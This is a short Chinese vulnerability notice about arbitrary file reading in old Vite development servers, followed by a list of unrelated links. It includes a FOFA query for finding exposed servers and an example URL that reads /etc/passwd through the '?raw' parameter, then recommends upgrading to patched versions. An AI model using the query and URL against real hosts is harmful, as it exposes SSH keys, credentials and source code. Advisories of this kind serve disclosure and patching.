当前位置: 首页 > news >正文

Vite 开发服务器漏洞

漏洞危害

对于使用 Vite 老版本(包括但不限于 >=6.2.0, <=6.2.2;>=6.1.0, <=6.1.1;>=6.0.0, <=6.0.11;>=5.0.0, <=5.4.14;<=4.5.9)的开发者和企业运维人员来说,这是一个不容忽视的问题。因为攻击者只需在浏览器中输入特定的 URL,就有可能获取目标机器上的源码、SSH 密钥、数据库账号、用户数据等任意文件信息,从而导致敏感信息泄露。

漏洞再现 

FOFA

body="/@vite/client"

在浏览器中输入 “http://[目标 IP]:5173/etc/passwd?raw”(以读取 etc/passwd 文件为例),即可成功读取系统文件内容。

修复建议 

 将 Vite 版本升级到官方公布的补丁版本,如 Vite 6.2.3、6.1.2、6.0.12、5.4.15、4.5.10 或更高版本,以获得官方修复后的安全保障。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.dtcms.com/a/94892.html

相关文章:

  • PC名词解释-笔记本的S0,S1,S2,S3,S4,S5状态
  • 元宇宙浪潮下,数字孪生如何“乘风破浪”?
  • SQL Server 动态构建 SQL 语句学习指南
  • Redis 数据淘汰策略深度解析
  • Text2SQL推理类大模型本地部署的解决方案
  • 物质与空:边界中的确定性,虚无中的无限可能——跨学科视角下的存在本质探析
  • 启扬RK3568开发板已成功适配OpenHarmony4.0版本
  • Faster RCNN Pytorch 实现 代码级 详解
  • Android Kotlin 中使用 MPAndroidChart 绘制优雅的曲线图:封装与优化实践
  • 学习记录-Ajax-自封装axios函数
  • 【10】Strongswan collections —— array
  • 使用HTTP提交git时,每次都要输入用户名和密码的解决方案
  • 使用ZYNQ芯片和LVGL框架实现用户高刷新UI设计系列教程(第五讲)
  • 寻找重复数 - LeetCode 287 题解笔记
  • Linux 系统检测进程死锁的方法
  • 今日 GitHub 热门项目大赏,你 pick 谁?
  • 4.go语言数组
  • 1.1 计算机网络的概念
  • 基于python的4个小游戏(免费直接使用)
  • LLaMA-Factory使用实战
  • Fiddler抓取HTTPS
  • Python中的Requests库
  • 使用VSCODE导致CPU占用率过高的处理方法
  • 【力扣hot100题】(001)字母异位词分组
  • Java 并发编程面经
  • RK3588,V4l2 读取Gmsl相机, Rga yuv422转换rgb (mmap)
  • 港中文迈向安全的具身AI!EARBench:基础模型在具身AI任务规划中的物理风险评估
  • Pytorch--tensor.view()
  • VSCode Flutter 快捷键
  • swagger上传图片请求报错